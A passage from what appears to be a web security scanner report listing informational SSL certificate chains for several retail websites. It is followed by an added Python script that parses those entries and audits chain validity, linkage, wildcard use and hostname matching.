Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon May 03 19:00:00 CDT 2010
Valid to:  Sat Jun 02 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

28.10. https://www.footlocker.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.footlocker.com
Issued by:  USERTrust Legacy Secure Server CA
Valid from:  Thu Mar 17 19:00:00 CDT 2011
Valid to:  Sat Jul 16 18:59:59 CDT 2011

Certificate chain #1

Issued to:  USERTrust Legacy Secure Server CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Nov 26 14:33:13 CST 2009
Valid to:  Sat Oct 31 23:00:00 CDT 2015

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

28.11. https://www.gnc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.gnc.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Fri Oct 09 05:04:37 CDT 2009
Valid to:  Wed Jan 08 17:00:54 CST 2014

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

28.12. https://www.guitarcenter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.guitarcenter.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Aug 31 19:00:00 CDT 2010
Valid to:  Thu Sep 15 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

28.13. https://www.helzberg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.helzberg.com,ST=PENNSYLVANIA
Issued by:  Akamai Subordinate CA 3
Valid from:  Wed Apr 13 11:44:05 CDT 2011
Valid to:  Fri Apr 13 11:44:05 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

28.14. https://www.orderhouse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.orderhouse.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.orderhouse.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Wed Mar 16 19:00:00 CDT 2011
Valid to:  Sun Mar 18 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

28.15. https://www.petsmart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.petsmart.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Fri Jan 08 07:50:30 CST 2010
Valid to:  Mon Mar 10 01:01:11 CDT 2014

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

28.16. https://www.redcrossstore.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redcrossstore.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.redcrossstore.org
Issued by:  Network Solutions Certificate Authority
Valid from:  Tue Nov 16 18:00:00 CST 2010
Valid to:  Sun Dec 04 17:59:59 CST 2011

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

28.17. https://www.restorationhardware.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.restorationhardware.com,ST=CA
Issued by:  Akamai Subordinate CA 3
Valid from:  Mon Dec 20 11:43:56 CST 2010
Valid to:  Tue Dec 20 11:43:56 CST 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

28.18. https://www.toshibadirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toshibadirect.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.toshibadirect.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Wed Jan 19 12:24:46 CST 2011
Valid to:  Sun Jan 19 12:24:46 CST 2014

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
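The findings in 28.12 through 28.18 list each certificate's subject, issuer and validity window but leave the checks to the reader. The script below is an added example and is not part of the XSS.CX report or of Burp; it parses the "Issued to / Issued by / Valid from / Valid to" blocks exactly as printed above and audits a chain for the things a practitioner looks at in this output: validity at scan time and time to expiry, issuer-to-subject linkage between consecutive entries, a self-signed root at the end, duplicate chain entries (as in 28.18, where chain #3 and #4 are the same ValiCert root), wildcard leaf certificates, and a CN-to-hostname match. Assumptions not stated by the report: CST is UTC-6 and CDT is UTC-5; the report's own timestamp is used as the scan date; the host name is matched only against the CN printed in "Issued to" (the report does not show subjectAltName entries, so they are not checked); the sample input is the 28.14 www.orderhouse.com finding copied from above.

```python
# Added example (not part of the XSS.CX report): stdlib-only audit of the
# "Server certificate / Certificate chain #N" blocks in the report's format.
# Assumptions: CST = UTC-6 and CDT = UTC-5 (the report does not state offsets),
# a caller-supplied scan date, and host matching against the printed CN only.
import re
from datetime import datetime, timedelta, timezone

TZ_OFFSETS = {"CST": -6, "CDT": -5, "UTC": 0, "GMT": 0}   # assumption: only these appear

DATE_RE = re.compile(r"^\w{3} (\w{3} \d{2} \d{2}:\d{2}:\d{2}) (\w+) (\d{4})$")
FIELD_RE = re.compile(r"^(Issued to|Issued by|Valid from|Valid to):\s+(.*)$")


def parse_report_date(text):
    """'Tue Aug 31 19:00:00 CDT 2010' -> timezone-aware datetime."""
    m = DATE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised date: {text!r}")
    body, tzname, year = m.groups()
    naive = datetime.strptime(f"{body} {year}", "%b %d %H:%M:%S %Y")
    return naive.replace(tzinfo=timezone(timedelta(hours=TZ_OFFSETS[tzname])))


def parse_chain(finding_text):
    """Return the certificates of one finding as dicts, leaf first."""
    certs, current = [], None
    for raw in finding_text.splitlines():
        line = raw.strip()
        if line == "Server certificate" or line.startswith("Certificate chain #"):
            current = {"label": line}
            certs.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2).strip()
    return certs


def subject_cn(issued_to):
    """The report appends DN parts such as ',ST=CA' to the CN; keep only the CN."""
    return issued_to.split(",", 1)[0].strip()


def hostname_matches(hostname, cn):
    """RFC 6125-style match: exact, or a single '*' covering one leftmost label."""
    host, pat = hostname.lower().rstrip("."), cn.lower().rstrip(".")
    if "*" not in pat:
        return host == pat
    if not pat.startswith("*.") or "*" in pat[1:]:
        return False                      # only the '*.example.com' form is accepted
    h_labels, p_labels = host.split("."), pat.split(".")
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def audit_chain(hostname, certs, scan_date, warn_days=30):
    """Return (severity, message) tuples; an empty list means nothing to report."""
    findings, seen = [], set()
    for i, c in enumerate(certs):
        subject, issuer = c["Issued to"], c["Issued by"]
        not_before = parse_report_date(c["Valid from"])
        not_after = parse_report_date(c["Valid to"])
        if not (not_before <= scan_date <= not_after):
            findings.append(("HIGH", f"{c['label']}: {subject} not valid at scan time"))
        elif not_after - scan_date < timedelta(days=warn_days):
            days = (not_after - scan_date).days
            findings.append(("MEDIUM", f"{c['label']}: {subject} expires in {days} days"))
        key = (subject, issuer, c["Valid from"], c["Valid to"])
        if key in seen:
            findings.append(("INFO", f"{c['label']}: duplicate of an earlier chain entry"))
        seen.add(key)
        # Each issuer must be the subject of the next certificate in the chain.
        if i + 1 < len(certs) and certs[i + 1]["Issued to"] != issuer:
            findings.append(("HIGH", f"{c['label']}: issuer '{issuer}' is not the next certificate's subject"))
    if certs:
        leaf, root = certs[0], certs[-1]
        cn = subject_cn(leaf["Issued to"])
        if not hostname_matches(hostname, cn):
            findings.append(("HIGH", f"leaf CN '{cn}' does not match host '{hostname}'"))
        if cn.startswith("*."):
            findings.append(("INFO", f"leaf is a wildcard certificate ({cn}); one key covers every {cn[2:]} host"))
        if root["Issued to"] != root["Issued by"]:
            findings.append(("INFO", "chain does not end at a self-signed root; trust depends on the client store"))
    return findings


# Sample input: the www.orderhouse.com finding (28.14) as printed in the report.
SAMPLE_ORDERHOUSE = """
Server certificate

Issued to:  *.orderhouse.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Wed Mar 16 19:00:00 CDT 2011
Valid to:  Sun Mar 18 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019
"""

SCAN_DATE = parse_report_date("Mon May 16 06:15:01 CDT 2011")   # the report's own timestamp


def audit_sample():
    return audit_chain("www.orderhouse.com", parse_chain(SAMPLE_ORDERHOUSE), SCAN_DATE)


if __name__ == "__main__":
    for sev, msg in audit_sample():
        print(sev, msg)
```

Run against the 28.14 finding at the report's scan date the only output is the INFO line about the wildcard leaf. The same chain audited with a reference date after Sun Mar 18 2012 is reported as HIGH for the server certificate, and a chain containing the same root twice, as 28.18 does, gets an INFO duplicate entry without any HIGH, because a repeated self-signed root still links correctly to itself.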
